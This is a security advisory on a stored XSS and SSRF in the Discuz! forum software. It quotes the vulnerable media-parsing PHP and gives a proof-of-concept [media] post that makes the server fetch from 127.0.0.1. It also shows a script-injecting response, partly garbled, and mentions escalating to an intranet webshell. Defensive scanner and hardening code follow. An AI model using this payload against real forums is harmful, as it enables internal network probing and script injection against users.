Discuz! conditional stored XSS and SSRF

Category: 漏洞时代 (Vulnerability Era)
Summary

In the file source/function/function_discuzcode.php, function discuzcode: follow parsemedia, then follow parseflv.

File source/function/function_discuzcode.php, function discuzcode:

```php
if(!defined('IN_MOBILE')) {
    if(strpos($msglower, '[/media]') !== FALSE) {
        // The /e modifier evaluates the replacement, so every [media=...]...[/media]
        // tag in the post body is handed straight to parsemedia()
        $message = preg_replace("/\[media=([\w,]+)\]\s*([^\[\<\r\n]+?)\s*\[\/media\]/ies", "parsemedia('\\1', '\\2')", $message);
    }
}
```

Follow parsemedia:

```php
function parsemedia($params, $url) {
    $params = explode(',', $params);
    $width = intval($params[1]) > 800 ? 800 : intval($params[1]);
    $height = intval($params[2]) > 600 ? 600 : intval($params[2]);
    $url = addslashes($url);
    // Only the first six characters of the URL are checked; anything that starts
    // with an allowed scheme prefix goes on to parseflv()
    if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static\//', $url) && !preg_match('/^data\//', $url)) {
        return dhtmlspecialchars($url);
    }
    if($flv = parseflv($url, $width, $height)) {
        return $flv;
    }
    // remaining branches of the function are not quoted here
}
```

Follow parseflv:

```php
function parseflv($url, $width = 0, $height = 0) {
    $lowerurl = strtolower($url);
    $flv = $iframe = $imgurl = '';
    if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) {
        $flv = $url;
    } elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) {
        $ctx = stream_context_create(array('http' => array('timeout' => 10)));
        if(preg_match("/http:\/\/v.youku.com\/v_show\/id_([^\/]+)(.html|)/i", $url, $matches)) {
            $flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf';
            $iframe = 'http://player.youku.com/embed/'.$matches[1];
            if(!$width && !$height) {
                $api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1];
                $str = stripslashes(file_get_contents($api, false, $ctx));
                if(!empty($str) && preg_match("/\"logo\":\"(.+?)\"/i", $str, $image)) {
                    $url = substr($image[1], 0, strrpos($image[1], '/')+1);
                    $filename = substr($image[1], strrpos($image[1], '/')+2);
                    $imgurl = $url.'0'.$filename;
                }
            }
        }
    } elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) {
        if(preg_match("/http:\/\/(www.)?tudou.com\/programs\/view\/([^\/]+)/i", $url, $matches)) {
            $flv = 'http://www.tudou.com/v/'.$matches[2];
            $iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2];
            if(!$width && !$height) {
                $str = file_get_contents($url, false, $ctx);
                if(!empty($str) && preg_match("/(.+?)/i", $str, $image)) {
                    $imgurl = trim($image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) {
        if(preg_match("/http:\/\/v.ku6.com\/show\/([^\/]+).html/i", $url, $matches)) {
            $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
            if(!$width && !$height) {
                $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
                    $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) {
        if(preg_match("/http:\/\/v.ku6.com\/special\/show_\d+\/([^\/]+).html/i", $url, $matches)) {
            $flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
            if(!$width && !$height) {
                $api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
                    $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) {
        if(preg_match("/http:\/\/www.youtube.com\/watch\?v=([^\/&]+)&?/i", $url, $matches)) {
            $flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1';
            $iframe = 'http://www.youtube.com/embed/'.$matches[1];
            if(!$width && !$height) {
                $str = file_get_contents($url, false, $ctx);
                if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':\s'(.+?)'/i", $str, $image)) {
                    $url = substr($image[1], 0, strrpos($image[1], '/')+1);
                    $filename = substr($image[1], strrpos($image[1], '/')+3);
                    $imgurl = $url.$filename;
                }
            }
        }
    } elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) {
        if(preg_match("/http:\/\/tv.mofile.com\/([^\/]+)/i", $url, $matches)) {
            $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
            if(!$width && !$height) {
                $str = file_get_contents($url, false, $ctx);
                if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
                    $imgurl = trim($image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) {
        if(preg_match("/http:\/\/v.mofile.com\/show\/([^\/]+).shtml/i", $url, $matches)) {
            $flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
            if(!$width && !$height) {
                $str = file_get_contents($url, false, $ctx);
                if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
                    $imgurl = trim($image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) {
        if(preg_match("/http:\/\/video.sina.com.cn\/v\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
            $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
            if(!$width && !$height) {
                $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str)) {
                    $imgurl = str_replace('imgurl=', '', trim($str));
                }
            }
        }
    } elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) {
        if(preg_match("/http:\/\/you.video.sina.com.cn\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
            $flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
            if(!$width && !$height) {
                $api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str)) {
                    $imgurl = str_replace('imgurl=', '', trim($str));
                }
            }
        }
    } elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) {
        if(preg_match("/http:\/\/my.tv.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
            $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
            if(!$width && !$height) {
                $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
                    $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) {
        if(preg_match("/http:\/\/v.blog.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
            $flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
            if(!$width && !$height) {
                $api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
                $str = file_get_contents($api, false, $ctx);
                if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
                    $imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
                }
            }
        }
    } elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) {
        $str = file_get_contents($url, false, $ctx);
        if(!empty($str) && preg_match("/var\sflv\s=\s'(.+?)';/i", $str, $matches)) {
            $flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]);
            if(!$width && !$height && preg_match("/var\simga=\s'(.+?)';/i", $str, $image)) {
                $imgurl = trim($image[1]);
            }
        }
    } elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) {
        if(preg_match("/http:\/\/www.56.com\/\S+\/play_album-aid-(\d+)_vid-(.+?).html/i", $url, $matches)) {
            $flv = 'http://player.56.com/v_'.$matches[2].'.swf';
            $matches[1] = $matches[2];
        } elseif(preg_match("/http:\/\/www.56.com\/\S+\/([^\/]+).html/i", $url, $matches)) {
            $flv = 'http://player.56.com/'.$matches[1].'.swf';
        }
        if(!$width && !$height && !empty($matches[1])) {
            $api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out';
            $str = file_get_contents($api, false, $ctx);
            if(!empty($str) && preg_match("/\"img\":\"(.+?)\"/i", $str, $image)) {
                $imgurl = trim($image[1]);
            }
        }
    }
    if($flv) {
        if(!$width && !$height) {
            return array('flv' => $flv, 'imgurl' => $imgurl);
        } else {
            $width = addslashes($width);
            $height = addslashes($height);
            $flv = addslashes($flv);
            $iframe = addslashes($iframe);
            $randomid = 'flv_'.random(3);
            $enablemobile = $iframe ? 'mobileplayer() ? "" : ' : '';
            return '$(\''.$randomid.'\').innerHTML=('.$enablemobile.'AC_FL_RunContent(\'width\', \''.$width.'\', \'height\', \''.$height.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.$flv.'\', \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\'));';
        }
    } else {
        return FALSE;
    }
}
```


As can be seen, several branches call file_get_contents with a URL the poster controls, so this is an SSRF. The fetched content is not discarded either: the imgurl extracted from the response is returned and then used in:

source/function/function_followcode.php:

```php
function fmakeflv($flv) {
    $randomid = 'video_'.random(3);
    $flv = is_array($flv) ? $flv : array('flv' => $flv);
    if(!empty($flv['imgurl'])) {
        // player markup built from $flv['flv'] and $flv['imgurl'] without escaping
        $html = ' ';
    } else {
        $html = '';
    }
    return fcodedisp($html, 'video');
}
```

Limitations: the XSS requires the broadcast (广播) feature to be enabled in the admin backend. The SSRF requires "allow multimedia code such as [media] [flash]" to be enabled; older versions seem to enable it by default, newer versions disable it by default, but it is often turned on later.
Post the following (note: it must be submitted with a tool, otherwise http://tudou.com is rewritten to http://tudou.com):

```
[media=0,0]http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa[/media]
```

The content served by http://127.0.0.1:8080/s.php is:

```
/Article/UploadPic/2016-2/20162322318814.gif');">aaalert('a');
```
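A scan of existing post bodies for the shape used above: parsemedia() checks only the first six characters of the URL and parseflv() uses strpos(), which matches the video host anywhere in the string, so the host actually contacted by file_get_contents() is whatever precedes the embedded video URL. The scanner below is an added example written for this page, not Discuz! code; the sample post bodies and post IDs are constructed, and hostnames are not resolved so it runs offline.

```php
<?php
// Added example (not Discuz! code): flag [media] tags whose fetch target is not
// the video host that the strpos() checks in parseflv() appear to match.

function host_is_internal(string $host): bool {
    if($host === 'localhost' || substr($host, -6) === '.local') {
        return true;
    }
    if(filter_var($host, FILTER_VALIDATE_IP) === false) {
        return false;   // hostnames are not resolved here so the example stays offline
    }
    // Loopback, link-local, reserved and RFC1918 literals all fail these flags
    return filter_var($host, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

function media_tag_findings(string $message): array {
    $findings = array();
    // Same tag shape discuzcode() hands to parsemedia(): [media=w,h]url[/media]
    if(!preg_match_all('/\[media=([\w,]+)\]\s*([^\[<\r\n]+?)\s*\[\/media\]/i', $message, $tags, PREG_SET_ORDER)) {
        return $findings;
    }
    foreach($tags as $tag) {
        $url = trim($tag[2]);
        // parse_url() gives the host file_get_contents() would really contact
        $host = strtolower((string) parse_url($url, PHP_URL_HOST));
        if(preg_match('/^https?:\/\/\S*?https?:\/\//i', $url)) {
            // A second scheme later in the URL: the substring that satisfied
            // strpos($lowerurl, 'tudou.com/programs/view/') is not the host fetched
            $findings[] = array('url' => $url, 'reason' => 'nested URL, fetch goes to '.$host);
        } elseif($host !== '' && host_is_internal($host)) {
            $findings[] = array('url' => $url, 'reason' => 'internal host '.$host);
        }
    }
    return $findings;
}

// Constructed sample post bodies: one benign, one shaped like the post above,
// one pointing at a private address without any nesting
$posts = array(
    101 => '[media=0,0]http://v.youku.com/v_show/id_XMTIzNDU2.html[/media]',
    102 => '[media=0,0]http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa[/media]',
    103 => '[media=0,0]http://10.0.0.5/fetch[/media]',
);

foreach($posts as $pid => $body) {
    foreach(media_tag_findings($body) as $f) {
        printf("post %d: %s (%s)\n", $pid, $f['reason'], $f['url']);
    }
}
```

Post 101 produces no finding; post 102 is reported as a nested URL whose fetch goes to 127.0.0.1, and post 103 as an internal host. In a real deployment the loop would read bodies from the post table, and a resolver step would be added for hostnames so that DNS names pointing at internal addresses are caught as well.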

The SSRF may be usable to obtain a shell on the internal network; see the Baidu article "从SSRF到内网WebShell之2" (From SSRF to an intranet WebShell, part 2).
Solution:
Filtering.
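The two checks that filtering has to cover here are the target of file_get_contents() and the imgurl that later lands in the player markup. The code below is an added example for this page, not Discuz!'s fix; the video-host allowlist and the function names are assumptions made for the example, and the markup in render_thumbnail() is a stand-in for whatever fmakeflv() emits.

```php
<?php
// Added example (not Discuz! code): a hardened version of the fetch-then-render
// pattern in parseflv()/fmakeflv(). The allowlist is an assumption for the example.

$VIDEO_HOST_ALLOWLIST = array('v.youku.com', 'www.tudou.com', 'tudou.com', 'v.ku6.com');

function is_allowed_fetch_url(string $url, array $allowlist): bool {
    $p = parse_url($url);
    if($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    if(!in_array(strtolower($p['scheme']), array('http', 'https'), true)) {
        return false;
    }
    if(isset($p['user']) || isset($p['pass'])) {
        return false;   // no user:pass@host forms
    }
    // Exact host comparison instead of strpos(): a video host appearing later
    // in the path or query does not make the URL acceptable
    $host = strtolower($p['host']);
    if(!in_array($host, $allowlist, true)) {
        return false;
    }
    // Resolve and require every A record to be a public address (IPv4 only here)
    $ips = gethostbynamel($host);
    if($ips === false) {
        return false;
    }
    foreach($ips as $ip) {
        if(filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

function safe_fetch(string $url, array $allowlist) {
    if(!is_allowed_fetch_url($url, $allowlist)) {
        return false;
    }
    $ctx = stream_context_create(array('http' => array(
        'timeout' => 10,
        'follow_location' => 0,   // a redirect must not move the request to another host
    )));
    return @file_get_contents($url, false, $ctx);
}

function safe_thumbnail_url(string $imgurl): string {
    // Only an absolute http(s) URL is accepted as an image source
    if(filter_var($imgurl, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($imgurl, PHP_URL_SCHEME));
    return ($scheme === 'http' || $scheme === 'https') ? $imgurl : '';
}

function render_thumbnail(string $imgurl, string $randomid): string {
    $src = safe_thumbnail_url($imgurl);
    if($src === '') {
        return '';
    }
    // Attribute context: ENT_QUOTES also covers the single quotes used inside onclick="$('id')"
    $safe = htmlspecialchars($src, ENT_QUOTES, 'UTF-8');
    $id = htmlspecialchars($randomid, ENT_QUOTES, 'UTF-8');
    return '<div class="video_img" id="'.$id.'"><img src="'.$safe.'" alt="" /></div>';
}

// Constructed inputs: the URL shape from the post above is refused before any DNS
// lookup because its host is 127.0.0.1, and a fetched thumbnail value carrying
// attribute-breaking characters is either refused or escaped
var_dump(is_allowed_fetch_url('http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa', $VIDEO_HOST_ALLOWLIST));   // bool(false)
echo render_thumbnail("http://example.com/x.gif');\">", 'video_abc'), "\n";
```

Two caveats apply. The resolve-then-fetch sequence leaves a small DNS rebinding window, so a production fix should connect to the resolved address (or run the fetch through a dedicated egress proxy) rather than re-resolve inside file_get_contents(). And escaping the thumbnail URL handles the markup context only; the fetched response should still be treated as untrusted text, never evaluated or written to disk.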
